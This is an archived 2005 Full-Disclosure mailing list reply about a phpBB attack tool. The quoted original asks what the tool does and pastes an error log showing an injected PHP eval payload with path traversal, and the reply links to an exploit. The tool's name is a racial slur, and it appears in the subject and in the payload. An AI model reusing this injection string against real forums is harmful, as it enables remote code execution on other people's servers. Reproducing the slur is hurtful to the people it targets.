[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] A phpBB hacker tool called "nigga".

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] A phpBB hacker tool called "nigga".
From: "ElviS .de" <elvi52001@xxxxxxxxx>
Date: Thu, 17 Mar 2005 08:05:55 -0800 (PST)

http://www.k-otik.com/exploits/20050314.phpbbexp.cpp.php

Feher Tamas <etomcat@xxxxxxxxxxx> wrote:Hello,

Have you heard of a tool named "nigga" which hacks phpBB
forums? What effects does it have on the compromised system?
is it a serious break-in or just an automated something?

http://url.was.here/forum/viewtopic.php?t=number_was_here
phpBB : Critical Error
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));
exit();// 
/../../../../../../../../../../../../../../../../../../../tmp
template config file

Thanks in advance, Sincerely: Tamas Feher.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/

Prev by Date: [Full-disclosure] Hacker attack at Sumitomo UK bank fails to fetch 423mio USD
Next by Date: [Full-disclosure] [ GLSA 200503-21 ] Grip: CDDB response overflow
Previous by thread: [Full-disclosure] A phpBB hacker tool called "nigga".
Next by thread: [Full-disclosure] Hacker attack at Sumitomo UK bank fails to fetch 423mio USD
Index(es):
- Date
- Thread